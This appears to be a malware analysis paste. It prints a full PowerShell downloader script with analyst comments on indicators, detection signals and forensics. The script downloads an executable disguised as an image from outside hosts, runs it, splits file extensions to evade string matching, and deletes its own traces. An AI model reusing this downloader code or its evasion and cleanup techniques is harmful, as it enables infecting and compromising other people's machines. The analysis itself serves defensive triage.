dynamoo

Malicious script

Apr 16th, 2015
  # Analyst notes: comments added for triage; the script lines are unchanged.
  # The leading "N." on each line is the paste site's line numbering, not script text.
  # Summary: PowerShell downloader stage. It fetches two remote files with
  # System.Net.WebClient into a hard-coded Temp directory, saves one of them as
  # an .exe, runs it through cmd.exe after a 15 second pause, then deletes
  # dropper artifacts and what appears to be its own script file.
  # Indicators visible in this listing: the two URLs in $stat and $ggtt, the
  # User-Agent string, and the Temp file names 8.exe, 444.jpg, 17055.vbs,
  # 17055.bat and 17055.ps1.
  # $aisjd, $dasdw, $asdw, $ajsi, $jsdhyfueh2hds and $ScriptDir are assigned but
  # never read in this listing; they look like filler that varies the script
  # text between samples (assumption, not shown by the code).
  1. $aisjd = '123';
  # Second download source; saved below as 444.jpg. The variable name suggests
  # an install/statistics beacon, but the listing does not show what the server
  # does with the request (confirm from network logs).
  2. $stat = 'http://savepic.su/5540444.png';
  # Payload source. The remote name ends in .gif, yet the content is written to
  # disk as an .exe and executed, so the extension is not a reliable type hint.
  3. $ggtt = 'https://www.dropbox.com/s/y5iffq6bp8m0drn/lo.gif?dl=1';
  # Hard-coded Temp directory for a specific user profile (PSPUBWS). Presumably
  # this was filled in on the machine where the sample ran; verify.
  4. $pths = 'C:\Users\PSPUBWS\AppData\Local\Temp\';
  # Base name shared by the .vbs/.bat/.ps1 paths built further down.
  5. $wehs = '17055';
  # Base name of the dropped executable (8.exe).
  6. $nnm = '8';
  7. $down = New-Object System.Net.WebClient;
  8. $dasdw='123';
  9. $file = $pths+$nnm+'.exe';
  10. $statfile = $pths+'444.jpg';
  # Fixed Safari-on-Macintosh User-Agent sent from a script that uses Windows
  # paths and cmd.exe. That OS mismatch is a usable proxy/IDS detection signal.
  11. $down.headers['User-Agent'] = ''+'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25'+'';
  12. $dasdw='123';
  # Writes the payload to <Temp>\8.exe, then the second file to <Temp>\444.jpg.
  13. $down.DownloadFile($ggtt,$file);
  14. $down.DownloadFile($stat,$statfile);
  15. $asdw='123';
  16. $ScriptDir = $MyInvocation.ScriptName;
  # The extensions are assembled from string fragments ('v'+'bs', 'b'+'at',
  # 'p'+'s'+'1', 'j'+'pg'), so the literal extensions never appear in the script
  # text. Presumably this is meant to defeat simple string matching; signatures
  # should key on behaviour or on the concatenation pattern.
  17. $vbsFilePath = $pths+$wehs+'.'+'v'+'bs'+'';
  # NOTE(review): this path is under user "MM", not under $pths (user PSPUBWS)
  # where 444.jpg was written by line 14.
  18. $statFilePath = 'c:\Users\MM\AppData\Local\Temp\444'+'.'+'j'+'pg';
  19. $btFilePath = $pths+$wehs+'.'+'b'+'at';
  20. $psFilePath = $pths+$wehs+'.'+'p'+'s'+'1';
  # 15 second pause before execution. The reason is not visible here; possibly
  # to outlast short automated analysis runs (assumption).
  21. Start-Sleep -s 15;
  # Executes the downloaded file. Process lineage to hunt for: powershell.exe
  # writes an .exe under AppData\Local\Temp, then cmd.exe /c launches it.
  22. cmd.exe /c $file;
  # Get-ChildItem results go to $file1..$file3 and are never used afterwards.
  # This script never creates the .vbs/.bat/.ps1 files, so they were presumably
  # written by an earlier stage of the delivery chain (confirm against the
  # original attachment or launcher).
  23. $file1 = gci $vbsFilePath -Force
  24. $file2 = gci $btFilePath -Force
  25. $ajsi ='412';
  26. $file3 = gci $psFilePath -Force
  27. $kasldds = $vbsFilePath
  # Cleanup: each artifact is removed only if it exists.
  28. If (Test-Path $kasldds){ Remove-Item $kasldds }
  29. If (Test-Path $btFilePath){ Remove-Item $btFilePath }
  # Targets the "MM" profile path. Unless that resolves to the same directory
  # as $pths, the downloaded <Temp>\444.jpg is left on disk; check for it
  # during forensics.
  30. If (Test-Path $statFilePath){ Remove-Item $statFilePath }
  31. $jsdhyfueh2hds = 'asdghyg23d jashdhsagdhasghdhgas';
  # Removes the dropped executable after it has been launched.
  32. If (Test-Path $file){ Remove-Item $file }
  # $psFilePath is never removed by name. This final call deletes whatever path
  # the script was invoked as, presumably the same 17055.ps1 (confirm). After a
  # successful run few files remain, so rely on process, network and
  # PowerShell logging rather than on-disk artifacts.
  33. Remove-Item $MyINvocation.InvocationName